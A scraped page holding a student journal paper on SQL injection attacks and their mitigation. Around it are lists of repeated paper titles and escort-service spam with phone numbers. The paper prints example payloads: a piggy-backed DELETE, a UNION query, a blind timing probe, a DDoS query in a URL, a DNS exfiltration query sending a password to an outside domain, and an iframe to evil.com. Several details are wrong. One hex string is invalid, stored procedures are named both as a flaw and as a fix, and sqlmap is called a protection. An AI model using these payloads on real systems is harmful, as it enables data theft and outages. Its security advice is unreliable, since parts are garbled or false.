TUNNELING IN HIMALAYAS WITH NATM METHOD: A SPECIAL REFERENCES TO SUNGAL TUNNE...
TUNNELING IN HIMALAYAS WITH NATM METHOD: A SPECIAL REFERENCES TO SUNGAL TUNNE...TUNNELING IN HIMALAYAS WITH NATM METHOD: A SPECIAL REFERENCES TO SUNGAL TUNNE...
TUNNELING IN HIMALAYAS WITH NATM METHOD: A SPECIAL REFERENCES TO SUNGAL TUNNE...IRJET Journal
 
STUDY THE EFFECT OF RESPONSE REDUCTION FACTOR ON RC FRAMED STRUCTURE
STUDY THE EFFECT OF RESPONSE REDUCTION FACTOR ON RC FRAMED STRUCTURESTUDY THE EFFECT OF RESPONSE REDUCTION FACTOR ON RC FRAMED STRUCTURE
STUDY THE EFFECT OF RESPONSE REDUCTION FACTOR ON RC FRAMED STRUCTUREIRJET Journal
 
A COMPARATIVE ANALYSIS OF RCC ELEMENT OF SLAB WITH STARK STEEL (HYSD STEEL) A...
A COMPARATIVE ANALYSIS OF RCC ELEMENT OF SLAB WITH STARK STEEL (HYSD STEEL) A...A COMPARATIVE ANALYSIS OF RCC ELEMENT OF SLAB WITH STARK STEEL (HYSD STEEL) A...
A COMPARATIVE ANALYSIS OF RCC ELEMENT OF SLAB WITH STARK STEEL (HYSD STEEL) A...IRJET Journal
 
Effect of Camber and Angles of Attack on Airfoil Characteristics
Effect of Camber and Angles of Attack on Airfoil CharacteristicsEffect of Camber and Angles of Attack on Airfoil Characteristics
Effect of Camber and Angles of Attack on Airfoil CharacteristicsIRJET Journal
 
A Review on the Progress and Challenges of Aluminum-Based Metal Matrix Compos...
A Review on the Progress and Challenges of Aluminum-Based Metal Matrix Compos...A Review on the Progress and Challenges of Aluminum-Based Metal Matrix Compos...
A Review on the Progress and Challenges of Aluminum-Based Metal Matrix Compos...IRJET Journal
 
Dynamic Urban Transit Optimization: A Graph Neural Network Approach for Real-...
Dynamic Urban Transit Optimization: A Graph Neural Network Approach for Real-...Dynamic Urban Transit Optimization: A Graph Neural Network Approach for Real-...
Dynamic Urban Transit Optimization: A Graph Neural Network Approach for Real-...IRJET Journal
 
Structural Analysis and Design of Multi-Storey Symmetric and Asymmetric Shape...
Structural Analysis and Design of Multi-Storey Symmetric and Asymmetric Shape...Structural Analysis and Design of Multi-Storey Symmetric and Asymmetric Shape...
Structural Analysis and Design of Multi-Storey Symmetric and Asymmetric Shape...IRJET Journal
 
A Review of “Seismic Response of RC Structures Having Plan and Vertical Irreg...
A Review of “Seismic Response of RC Structures Having Plan and Vertical Irreg...A Review of “Seismic Response of RC Structures Having Plan and Vertical Irreg...
A Review of “Seismic Response of RC Structures Having Plan and Vertical Irreg...IRJET Journal
 
A REVIEW ON MACHINE LEARNING IN ADAS
A REVIEW ON MACHINE LEARNING IN ADASA REVIEW ON MACHINE LEARNING IN ADAS
A REVIEW ON MACHINE LEARNING IN ADASIRJET Journal
 
Long Term Trend Analysis of Precipitation and Temperature for Asosa district,...
Long Term Trend Analysis of Precipitation and Temperature for Asosa district,...Long Term Trend Analysis of Precipitation and Temperature for Asosa district,...
Long Term Trend Analysis of Precipitation and Temperature for Asosa district,...IRJET Journal
 
P.E.B. Framed Structure Design and Analysis Using STAAD Pro
P.E.B. Framed Structure Design and Analysis Using STAAD ProP.E.B. Framed Structure Design and Analysis Using STAAD Pro
P.E.B. Framed Structure Design and Analysis Using STAAD ProIRJET Journal
 
A Review on Innovative Fiber Integration for Enhanced Reinforcement of Concre...
A Review on Innovative Fiber Integration for Enhanced Reinforcement of Concre...A Review on Innovative Fiber Integration for Enhanced Reinforcement of Concre...
A Review on Innovative Fiber Integration for Enhanced Reinforcement of Concre...IRJET Journal
 
Survey Paper on Cloud-Based Secured Healthcare System
Survey Paper on Cloud-Based Secured Healthcare SystemSurvey Paper on Cloud-Based Secured Healthcare System
Survey Paper on Cloud-Based Secured Healthcare SystemIRJET Journal
 
Review on studies and research on widening of existing concrete bridges
Review on studies and research on widening of existing concrete bridgesReview on studies and research on widening of existing concrete bridges
Review on studies and research on widening of existing concrete bridgesIRJET Journal
 
React based fullstack edtech web application
React based fullstack edtech web applicationReact based fullstack edtech web application
React based fullstack edtech web applicationIRJET Journal
 
A Comprehensive Review of Integrating IoT and Blockchain Technologies in the ...
A Comprehensive Review of Integrating IoT and Blockchain Technologies in the ...A Comprehensive Review of Integrating IoT and Blockchain Technologies in the ...
A Comprehensive Review of Integrating IoT and Blockchain Technologies in the ...IRJET Journal
 
A REVIEW ON THE PERFORMANCE OF COCONUT FIBRE REINFORCED CONCRETE.
A REVIEW ON THE PERFORMANCE OF COCONUT FIBRE REINFORCED CONCRETE.A REVIEW ON THE PERFORMANCE OF COCONUT FIBRE REINFORCED CONCRETE.
A REVIEW ON THE PERFORMANCE OF COCONUT FIBRE REINFORCED CONCRETE.IRJET Journal
 
Optimizing Business Management Process Workflows: The Dynamic Influence of Mi...
Optimizing Business Management Process Workflows: The Dynamic Influence of Mi...Optimizing Business Management Process Workflows: The Dynamic Influence of Mi...
Optimizing Business Management Process Workflows: The Dynamic Influence of Mi...IRJET Journal
 
Multistoried and Multi Bay Steel Building Frame by using Seismic Design
Multistoried and Multi Bay Steel Building Frame by using Seismic DesignMultistoried and Multi Bay Steel Building Frame by using Seismic Design
Multistoried and Multi Bay Steel Building Frame by using Seismic DesignIRJET Journal
 
Cost Optimization of Construction Using Plastic Waste as a Sustainable Constr...
Cost Optimization of Construction Using Plastic Waste as a Sustainable Constr...Cost Optimization of Construction Using Plastic Waste as a Sustainable Constr...
Cost Optimization of Construction Using Plastic Waste as a Sustainable Constr...IRJET Journal
 

More from IRJET Journal (20)

TUNNELING IN HIMALAYAS WITH NATM METHOD: A SPECIAL REFERENCES TO SUNGAL TUNNE...
TUNNELING IN HIMALAYAS WITH NATM METHOD: A SPECIAL REFERENCES TO SUNGAL TUNNE...TUNNELING IN HIMALAYAS WITH NATM METHOD: A SPECIAL REFERENCES TO SUNGAL TUNNE...
TUNNELING IN HIMALAYAS WITH NATM METHOD: A SPECIAL REFERENCES TO SUNGAL TUNNE...
 
STUDY THE EFFECT OF RESPONSE REDUCTION FACTOR ON RC FRAMED STRUCTURE
STUDY THE EFFECT OF RESPONSE REDUCTION FACTOR ON RC FRAMED STRUCTURESTUDY THE EFFECT OF RESPONSE REDUCTION FACTOR ON RC FRAMED STRUCTURE
STUDY THE EFFECT OF RESPONSE REDUCTION FACTOR ON RC FRAMED STRUCTURE
 
A COMPARATIVE ANALYSIS OF RCC ELEMENT OF SLAB WITH STARK STEEL (HYSD STEEL) A...
A COMPARATIVE ANALYSIS OF RCC ELEMENT OF SLAB WITH STARK STEEL (HYSD STEEL) A...A COMPARATIVE ANALYSIS OF RCC ELEMENT OF SLAB WITH STARK STEEL (HYSD STEEL) A...
A COMPARATIVE ANALYSIS OF RCC ELEMENT OF SLAB WITH STARK STEEL (HYSD STEEL) A...
 
Effect of Camber and Angles of Attack on Airfoil Characteristics
Effect of Camber and Angles of Attack on Airfoil CharacteristicsEffect of Camber and Angles of Attack on Airfoil Characteristics
Effect of Camber and Angles of Attack on Airfoil Characteristics
 
A Review on the Progress and Challenges of Aluminum-Based Metal Matrix Compos...
A Review on the Progress and Challenges of Aluminum-Based Metal Matrix Compos...A Review on the Progress and Challenges of Aluminum-Based Metal Matrix Compos...
A Review on the Progress and Challenges of Aluminum-Based Metal Matrix Compos...
 
Dynamic Urban Transit Optimization: A Graph Neural Network Approach for Real-...
Dynamic Urban Transit Optimization: A Graph Neural Network Approach for Real-...Dynamic Urban Transit Optimization: A Graph Neural Network Approach for Real-...
Dynamic Urban Transit Optimization: A Graph Neural Network Approach for Real-...
 
Structural Analysis and Design of Multi-Storey Symmetric and Asymmetric Shape...
Structural Analysis and Design of Multi-Storey Symmetric and Asymmetric Shape...Structural Analysis and Design of Multi-Storey Symmetric and Asymmetric Shape...
Structural Analysis and Design of Multi-Storey Symmetric and Asymmetric Shape...
 
A Review of “Seismic Response of RC Structures Having Plan and Vertical Irreg...
A Review of “Seismic Response of RC Structures Having Plan and Vertical Irreg...A Review of “Seismic Response of RC Structures Having Plan and Vertical Irreg...
A Review of “Seismic Response of RC Structures Having Plan and Vertical Irreg...
 
A REVIEW ON MACHINE LEARNING IN ADAS
A REVIEW ON MACHINE LEARNING IN ADASA REVIEW ON MACHINE LEARNING IN ADAS
A REVIEW ON MACHINE LEARNING IN ADAS
 
Long Term Trend Analysis of Precipitation and Temperature for Asosa district,...
Long Term Trend Analysis of Precipitation and Temperature for Asosa district,...Long Term Trend Analysis of Precipitation and Temperature for Asosa district,...
Long Term Trend Analysis of Precipitation and Temperature for Asosa district,...
 
P.E.B. Framed Structure Design and Analysis Using STAAD Pro
P.E.B. Framed Structure Design and Analysis Using STAAD ProP.E.B. Framed Structure Design and Analysis Using STAAD Pro
P.E.B. Framed Structure Design and Analysis Using STAAD Pro
 
A Review on Innovative Fiber Integration for Enhanced Reinforcement of Concre...
A Review on Innovative Fiber Integration for Enhanced Reinforcement of Concre...A Review on Innovative Fiber Integration for Enhanced Reinforcement of Concre...
A Review on Innovative Fiber Integration for Enhanced Reinforcement of Concre...
 
Survey Paper on Cloud-Based Secured Healthcare System
Survey Paper on Cloud-Based Secured Healthcare SystemSurvey Paper on Cloud-Based Secured Healthcare System
Survey Paper on Cloud-Based Secured Healthcare System
 
Review on studies and research on widening of existing concrete bridges
Review on studies and research on widening of existing concrete bridgesReview on studies and research on widening of existing concrete bridges
Review on studies and research on widening of existing concrete bridges
 
React based fullstack edtech web application
React based fullstack edtech web applicationReact based fullstack edtech web application
React based fullstack edtech web application
 
A Comprehensive Review of Integrating IoT and Blockchain Technologies in the ...
A Comprehensive Review of Integrating IoT and Blockchain Technologies in the ...A Comprehensive Review of Integrating IoT and Blockchain Technologies in the ...
A Comprehensive Review of Integrating IoT and Blockchain Technologies in the ...
 
A REVIEW ON THE PERFORMANCE OF COCONUT FIBRE REINFORCED CONCRETE.
A REVIEW ON THE PERFORMANCE OF COCONUT FIBRE REINFORCED CONCRETE.A REVIEW ON THE PERFORMANCE OF COCONUT FIBRE REINFORCED CONCRETE.
A REVIEW ON THE PERFORMANCE OF COCONUT FIBRE REINFORCED CONCRETE.
 
Optimizing Business Management Process Workflows: The Dynamic Influence of Mi...
Optimizing Business Management Process Workflows: The Dynamic Influence of Mi...Optimizing Business Management Process Workflows: The Dynamic Influence of Mi...
Optimizing Business Management Process Workflows: The Dynamic Influence of Mi...
 
Multistoried and Multi Bay Steel Building Frame by using Seismic Design
Multistoried and Multi Bay Steel Building Frame by using Seismic DesignMultistoried and Multi Bay Steel Building Frame by using Seismic Design
Multistoried and Multi Bay Steel Building Frame by using Seismic Design
 
Cost Optimization of Construction Using Plastic Waste as a Sustainable Constr...
Cost Optimization of Construction Using Plastic Waste as a Sustainable Constr...Cost Optimization of Construction Using Plastic Waste as a Sustainable Constr...
Cost Optimization of Construction Using Plastic Waste as a Sustainable Constr...
 

Recently uploaded

Oxy acetylene welding presentation note.
Oxy acetylene welding presentation note.Oxy acetylene welding presentation note.
Oxy acetylene welding presentation note.eptoze12
 
GDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentationGDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentationGDSCAESB
 
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...srsj9000
 
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEINFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEroselinkalist12
 
IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024Mark Billinghurst
 
DATA ANALYTICS PPT definition usage example
DATA ANALYTICS PPT definition usage exampleDATA ANALYTICS PPT definition usage example
DATA ANALYTICS PPT definition usage examplePragyanshuParadkar1
 
HARMONY IN THE NATURE AND EXISTENCE - Unit-IV
HARMONY IN THE NATURE AND EXISTENCE - Unit-IVHARMONY IN THE NATURE AND EXISTENCE - Unit-IV
HARMONY IN THE NATURE AND EXISTENCE - Unit-IVRajaP95
 
Biology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxBiology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxDeepakSakkari2
 
Churning of Butter, Factors affecting .
Churning of Butter, Factors affecting .Churning of Butter, Factors affecting .
Churning of Butter, Factors affecting .Satyam Kumar
 
Effects of rheological properties on mixing
Effects of rheological properties on mixingEffects of rheological properties on mixing
Effects of rheological properties on mixingviprabot1
 
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...VICTOR MAESTRE RAMIREZ
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionDr.Costas Sachpazis
 
Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...VICTOR MAESTRE RAMIREZ
 
Call Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call GirlsCall Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call Girlsssuser7cb4ff
 
Electronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfElectronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfme23b1001
 
Artificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptxArtificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptxbritheesh05
 

Recently uploaded (20)

young call girls in Green Park🔝 9953056974 🔝 escort Service
young call girls in Green Park🔝 9953056974 🔝 escort Serviceyoung call girls in Green Park🔝 9953056974 🔝 escort Service
young call girls in Green Park🔝 9953056974 🔝 escort Service
 
Oxy acetylene welding presentation note.
Oxy acetylene welding presentation note.Oxy acetylene welding presentation note.
Oxy acetylene welding presentation note.
 
GDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentationGDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentation
 
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
 
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEINFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
 
IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024
 
DATA ANALYTICS PPT definition usage example
DATA ANALYTICS PPT definition usage exampleDATA ANALYTICS PPT definition usage example
DATA ANALYTICS PPT definition usage example
 
HARMONY IN THE NATURE AND EXISTENCE - Unit-IV
HARMONY IN THE NATURE AND EXISTENCE - Unit-IVHARMONY IN THE NATURE AND EXISTENCE - Unit-IV
HARMONY IN THE NATURE AND EXISTENCE - Unit-IV
 
Biology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxBiology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptx
 
Churning of Butter, Factors affecting .
Churning of Butter, Factors affecting .Churning of Butter, Factors affecting .
Churning of Butter, Factors affecting .
 
Effects of rheological properties on mixing
Effects of rheological properties on mixingEffects of rheological properties on mixing
Effects of rheological properties on mixing
 
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
 
Call Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCR
Call Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCRCall Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCR
Call Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCR
 
Design and analysis of solar grass cutter.pdf
Design and analysis of solar grass cutter.pdfDesign and analysis of solar grass cutter.pdf
Design and analysis of solar grass cutter.pdf
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
 
Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...
 
Call Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call GirlsCall Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call Girls
 
Electronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfElectronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdf
 
Artificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptxArtificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptx
 
🔝9953056974🔝!!-YOUNG call girls in Rajendra Nagar Escort rvice Shot 2000 nigh...
🔝9953056974🔝!!-YOUNG call girls in Rajendra Nagar Escort rvice Shot 2000 nigh...🔝9953056974🔝!!-YOUNG call girls in Rajendra Nagar Escort rvice Shot 2000 nigh...
🔝9953056974🔝!!-YOUNG call girls in Rajendra Nagar Escort rvice Shot 2000 nigh...
 

IRJET - SQL Injection: Attack & Mitigation

  • 1. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 08 Issue: 01 | Jan 2021 www.irjet.net p-ISSN: 2395-0072 © 2021, IRJET | Impact Factor value: 7.529 | ISO 9001:2008 Certified Journal | Page 42 SQL INJECTION: ATTACK & MITIGATION Vishnu Menon Student, Dept. of Information Technology, Keraleeya Samajam (REGD.) Model College Maharashtra, India ------------------------------------------------------------------------***------------------------------------------------------------------------- ABSTRACT: - Nowadays, all around the world, SQL Injection Attack (SQLI) is considered to be the serious security threat over the Internet for many web-based applications. Organizations use various kinds of Web Applications for various business purposes. These organizations use SQL Language in MySQL, PostgreSQL to store information into the database. SQL Injection is flexible, hence powerful. SQL has become a center of attention of hackers due to its massive usage in almost every web application. They (Hackers) take advantage of poorly coded Web Applications to breach the database. They make use of SQL Query through unauthorized user input into the legitimate SQL Statement to gain unauthorized access to the database and gather confidential information. In this paper, we have tried to present different types of SQL Injection Attacks (SQLIA), it’s detection and prevention methods used. Keywords: - SQL Injection, OWASP Top-Ten, DDoS Attack, Authentication Bypass, XSS, Attack Types, Mitigation 1. INTRODUCTION: - SQL Injection is one of the top-most vulnerabilities in OWASP Top-Ten Website Vulnerability as compared to rest of the website flaws. According to the survey conducted, it has been observed that from the year 2017 to 2019 SQL Injection has mostly taken place than rest of the website Attacks. This attack takes advantage of un-sanitized input flaws to pass SQL command through web application for execution by the database. This is a basic attack where the attacker gains unauthorized access to the database or to access the confidential files directly from the database. It is not a web server or database flaw, but is an issue with the web applications. Using SQL Injection following types of attacks can be implemented: -  Authentication Bypass: - Gaining unauthorized access and later achieving administrative privileges to the web application without providing valid username and password.  Information Disclosure: - Confidential information can be obtained that is stored in the database.  Compromised Data Integrity: - Webpage Defacement, inserting malicious content into webpages or altering contents of a database can be achieved from this kind of attack.  Compromised availability of Data: - This attack can be implemented to delete database information, logs, and audit information that is stored in the database.  Remote Code Execution: - This attack can be used to compromise the host Operating System. WORKING OF SQL INJECTION ATTACK: - SQL Injection consists of various types. 2. BACKGROUND STUDY: - SQL Injection vulnerability has been known for twenty- one (21) years and still is still the most dangerous vulnerability. This vulnerability was first discovered “Rain Forest Puppy” pseudonym of Jeff Forristal in December 1998 in the issue of Phrack Magazine that described a Microsoft SQL Server that retrieved sensitive data through the use of commands in normal user inputs like ‘name’ and ‘phone number’.
  • 2. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 08 Issue: 01 | Jan 2021 www.irjet.net p-ISSN: 2395-0072 © 2021, IRJET | Impact Factor value: 7.529 | ISO 9001:2008 Certified Journal | Page 43 3. TYPES OF SQL INJECTION ATTACKS: - There are 2 main types of SQL Injection Attacks, viz. Classical SQL Injection and Modern SQL Injection. Modern SQL Injection is considered to be more dangerous. Different types of SQL Injections are discussed below. A. Classical SQL Injection: - Various types of Classical SQL Injections are as follows: -  Piggy Backed Queries: - Purpose of Attack: - Information Retrieval, Denial of Service In this form of attack, the attacker (or Hacker) tries to “piggy back” the query with the original query in the input field which is present in the web application. The word piggy-backed indicates as “on or as if on the back of another”. During the execution of the legitimate query, the second malicious or harmful query also gets executed immediately after the first query to perform the injection attack. This is known as menacing (threatening) attack as it fully exploits the database.  Stored Procedures: - Purpose of Attack: - Authentication Bypass, Denial of Service In this form of attack, any malicious user can input any malicious data in the username and password fields. The simple command that is entered by the malicious user can corrupt the database and can lead to disruption of services.  Union Query: - This form of attack uses the union operator (UNION) when inserting the SQL Query. Two or more SQL queries are joined together with the Union Operator. The first query is a normal SQL query which is appended by the malicious SQL statement by the Union Operator. Using this operator, the attacker can bypass the prevention and detection mechanism of the system. The attacker can add “--“to make the database ignore the condition followed by it as this becomes the comment for the SQL Parser.  Alternative Encoding: - In this form of attack, the attacker changes the SQL Injection pattern so that it goes undetected from common detection and prevention techniques. The attacker makes use of Hexadecimal, Unicode, ASCII code and Octal code in SQL statement to make it undetectable. B. Advanced SQL Injection: - Advanced SQL Injections are of various types.  Blind SQL Injection Attack: - The attacker uses this kind of SQL Injection attack when the web application is vulnerable to the SQL Injection but the error messages are not visible to the attacker. The Blind SQL Injection is used when the attacker tries to exploit the web application and instead of displaying the SQL error message, custom page is displayed. A True or False condition is posed to the database by an attacker to check if the web application is vulnerable to SQL Injection attack.  Compounded SQL Injection Attack: - Due to rapid increase of detection and prevention method of SQL Injection Attack, attackers developed a technique called Compounded SQL Injection Attack. In this form of attack, there exist a mixture of SQL Injection Attack and other Web Application Attacks which can be detailed as below. (1) SQL Injection+DDoS Attack: - DDoS (Distributed Denial of Service) Attack is used by an attacker in order to hang the server and to make the legitimate user unable to access the resources of the Web Application. The greater the number of rows and columns in the database, more the chances for the database to be vulnerable to SQL DDoS Attack. (2) SQL Injection+DNS Hijacking: - Data Transfer using Blind SQL Injection Attack is usually slower. Hence the attacker introduced another method i.e. DNS Hijacking in which the attacker modifies the DNS entries by exploiting the Domain Registers. This method is much faster and less noisy as compared to Blind SQL Injection Attack. This Attack can be conducted in two ways; first by injecting the malware or DNS Trojan software in the system or workstation; and second by hacking and modifying a particular website so that the user gets redirected to a fake website. (3) SQL Injection+XSS Attack: - In this type of attack, SQL Injection is the medium for setting up the attack, the rest of the attack is performed using XSS (Cross Site Scripting) Attack. They are also known as the “Third Wave Attacks” as they are not the same as the old way of attacks; instead they are the commands to hide from Network Monitoring Devices. These types of attacks are mainly used for data extraction.
  • 3. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 08 Issue: 01 | Jan 2021 www.irjet.net p-ISSN: 2395-0072 © 2021, IRJET | Impact Factor value: 7.529 | ISO 9001:2008 Certified Journal | Page 44 (4) SQL Injection+Insufficient Authentication: - The compounded attack is followed by Insufficient Authentication where the user or the administrator of the site is a novice. The security policy has not been properly implemented where the application fails to identify the user’s location, services or application. This type of website can allow an attacker to bypass the authentication and stealing the confidential data without actually verifying the identity of the user. To make this attack successful, first identify whether the website has insufficient authentication vulnerability present and if it does have, SQL Injection Attack can be implemented. (5) SQL Injection Attack using Cross Domain Policies of Rich Internet Application: - Cross-Domain Policy is an XML file which permits web client to handle data in multiple domains and is used to define the list of RIA hosting domains that are allowed to collect or retrieve information from Content Providers Domain. Almost every web application use Adobe Flash Player and Microsoft Silverlight for improving and increasing the user interaction with the websites. The use of such applications is vulnerable to SQL Injection and other kinds of attacks as proper care has not been taken while programming the code. Improper use and misinterpretation of Cross-Domain Policy can give rise to vulnerability in Rich Internet Application. When the legitimate website was being attacked by Asprox Injection String, Firefox or Internet Explorer and Javascript code was used for SQL Injection Attack. 4. EVASION USING DIFFERENT TYPES OF SQL INJECTION AND ITS MITIGATION: - We have discussed above the various types of SQL Injection Attacks. Below are the methods on how the attackers evade using these techniques. A. Classical SQL Injection: - (1) Piggy Backed Queries: - EVASION TECHNIQUE: - select emp_info from employee where uid=” admin” AND pass=’123’; DELETE from employee where empname=’Austin’; On executing the first query the interpreter notices the semicolon (;) and begin executing the second query with the first statement. The second query is malicious as it will delete all the data of the employee named “Austin”. MITIGATION: - These attacks can be mitigated by determining the legitimate SQL Statement with the help of correct validation or to introduce new detection techniques. These kinds of attack can be mitigated using Static Analysis. (2) Stored Procedure: - EVASION TECHNIQUE: - create procedure emp_info @username varchar2 @pass varchar2 @emp_id int AS BEGIN EXEC (‘SELECT employee_info from employee_table where username=’ “+@username “ ‘ and password=’ “+@pass “ ‘ GO The mentioned code is vulnerable to SQL Injection Attack as a malicious user can enter the malicious data in the input fields of Username and Password. Command entered by the user can destroy whole database and can also lead to service destruction. MITIGATION: - To prevent the data of the user from being compromised it is advised not to store any sensitive information in stored procedures, as it does not have the most important security features. (3) Union Query: - EVASION TECHNIQUE: - Select * from employee where id=’100’ UNION select * from payment_details where user=’admin’--‘and password=’pass’ The example above shows two queries that is being executed. The first query is a normal query. The second query is malicious and the text following (--) which becomes a comment for the SQL Parser. The attacker takes an advantage of this and performs an attack on the web application or website. MITIGATION: - Input Validation. (4) Alternative Encoding: - EVASION TECHNIQUE: - select * from employee where uname=’’and pass=’’;exec(char(Ox73687574646j776e))' In the above command, the char () function and ASCII hexadecimal encoding have been used. The char () function will return the actual characters of the hexadecimal character encoding. The encoded string will be translated to the “shutdown” command and it will be executed by the database.
  • 4. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 08 Issue: 01 | Jan 2021 www.irjet.net p-ISSN: 2395-0072 © 2021, IRJET | Impact Factor value: 7.529 | ISO 9001:2008 Certified Journal | Page 45 MITIGATION: - 1) Whenever one requires the data from the web- based forms, ensure that you use POST () instead of GET () as the GET () appends the data with the URL which is not a good security practice. 2) Whenever the data is submitted to the server always ensure that some amount of the data must only be accepted at the particular interval and it must fall under the specified bounds (maximum and minimum lengths) and also contains specified contents. B. Advanced SQL Injection: - (1) Blind SQL Injection: - '; if (select count(username) from users where username = 'Administrator' AND substring (password, 1, 1) > 'p') = 1 wait for delay '0:0: {delay}'— The above command retrieves the data the way it is described, by systematically testing one character at a time. MITIGATION: - 1) The countermeasure of this kind of attack is adopt secure coding practices, that is independent of the language. 2) Avoid the use of Dynamic SQL. 3) Usage of Stored Procedures. 4) Usage of Vulnerability Scanner and performing regular scan is recommended. (2) Compounded SQL Injection Attack: - (A) SQL Injection+DDoS Attack: - select table1 from (select decode(encode(convert(compress(post) using latin1), concat (post, post, post, post)), sha1(concat(post, post, post,post))) as table1 from table_1)a-- The above-mentioned code is used to perform the DDoS Attack on the website. If we know only particular column is only vulnerable then we will try to inject the code to those columns which is found to be vulnerable. Let us consider that the 3rd column is vulnerable and we will inject the payload to the website as follows. http://certifiedhacker.com/hack.php?id=1’ union select 1,2,table1,4 from (select decode(encode(convert(compress(post) using latin1, des_encrypt(concat(post,post,post,post),8)),des_encr ypt(sha1(concat(post,post,post,post)),9)) as table1 from table_1)a-- MITIGATION: - The Cluster Analysis Methodology is used to identify the DDoS Attack that is being performed on the website and this can easily identify the type of attack on the system. (B) SQL Injection+DNS Hijacking: - do_dns_lookup ((select top 1 password from employee) +’. inse6140.net’); The select statement is used to retrieve the password hash that interests the hacker or attacker followed by the domain name(‘inse6140.net’) that is to be controlled. This is done with the help of DNS Hijacking. DNS lookup has to be performed at last. The packet sniffer has to be run on the name server for the domain and wait for the DNS Record containing our hash. MITIGATION: - 1) DNS Hijacking has been prevented by not downloading the free utilities from the websites as they mostly contain vulnerabilities. 2) DNS Rebinding tries to capture the router settings of the client or user. 3) DNS Hijacking can be prevented by the use of Session Shield i.e. Light Weight Client-Side Protection Mechanism. 4) Sqlmap is used to protect against SQL Injection+DNS Attack and has the feature of the DNS exfiltration and many other command-line designed for DNS prevention and detection. (C) SQL Injection+XSS Attack: - print “<html>” print “<h1>Most recent comment</h1>” print database.latestComment <iframe src=http://evil.com/xss.html> print “</html>” The above command will get executed and the XSS Attack is performed with the 